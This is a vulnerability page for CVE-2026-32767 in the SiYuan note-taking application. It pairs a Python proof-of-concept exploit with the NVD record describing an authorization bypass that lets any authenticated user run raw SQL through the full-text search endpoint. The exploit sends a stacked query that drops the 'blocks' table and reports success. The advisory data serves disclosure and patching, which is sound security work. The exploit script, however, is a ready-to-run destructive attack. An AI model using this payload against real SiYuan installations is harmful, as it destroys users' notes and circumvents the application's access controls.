CVE-2026-32767

import requests import json # Target URL (Default SiYuan port is 6806) target_url = "http://localhost:6806/api/search/fullTextSearchBlock" # Valid authentication cookie/token is required as the user must be authenticated headers = { "Content-Type": "application/json", "Authorization": "Bearer YOUR_VALID_SESSION_TOKEN_HERE" } # Exploit payload # Setting method to 2 triggers the raw SQL execution path # The 'query' parameter accepts the raw SQL statement payload = { "method": 2, "query": "SELECT * FROM blocks; DROP TABLE blocks; --" } try: response = requests.post(target_url, headers=headers, json=payload, timeout=10) if response.status_code == 200: print("[+] Exploit successful! SQL executed.") print("[+] Response:", response.text) else: print("[-] Exploit failed or server returned error.") print("[-] Status Code:", response.status_code) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-32767", "sourceIdentifier": "[email protected]", "published": "2026-03-20T01:15:55.597", "lastModified": "2026-03-23T15:23:44.380", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SiYuan is a personal knowledge management system. Versions 3.6.0 and below contain an authorization bypass vulnerability in the /api/search/fullTextSearchBlock endpoint. When the method parameter is set to 2, the endpoint passes user-supplied input directly as a raw SQL statement to the underlying SQLite database without any authorization or read-only checks. This allows any authenticated user — including those with the Reader role — to execute arbitrary SQL statements (SELECT, DELETE, UPDATE, DROP TABLE, etc.) against the application's database. This is inconsistent with the application's own security model: the dedicated SQL endpoint (/api/query/sql) correctly requires both CheckAdminRole and CheckReadonly middleware, but the search endpoint bypasses these controls entirely. This issue has been fixed in version 3.6.1."}, {"lang": "es", "value": "SiYuan es un sistema de gestión de conocimiento personal. Las versiones 3.6.0 e inferiores contienen una vulnerabilidad de omisión de autorización en el endpoint /api/search/fullTextSearchBlock. Cuando el parámetro method se establece en 2, el endpoint pasa la entrada proporcionada por el usuario directamente como una sentencia SQL sin procesar a la base de datos SQLite subyacente sin ninguna autorización ni comprobación de solo lectura. Esto permite a cualquier usuario autenticado — incluidos aquellos con el rol de Lector — ejecutar sentencias SQL arbitrarias (SELECT, DELETE, UPDATE, DROP TABLE, etc.) contra la base de datos de la aplicación. Esto es inconsistente con el propio modelo de seguridad de la aplicación: el endpoint SQL dedicado (/api/query/sql) requiere correctamente el middleware CheckAdminRole y CheckReadonly, pero el endpoint de búsqueda omite estos controles por completo. Este problema ha sido solucionado en la versión 3.6.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}, {"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:b3log:siyuan:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.6.1", "matchCriteriaId": "E1AA6470-222A-4841-A487-DF65F9859780"}]}]}], "references": [{"url": "https://github.com/siyuan-note/siyuan/commit/d5e2d0bce0dffef5f61bd8066954bc2d41181fc5", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/siyuan-note/siyuan/issues/17209", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}, {"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-j7wh-x834-p3r7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}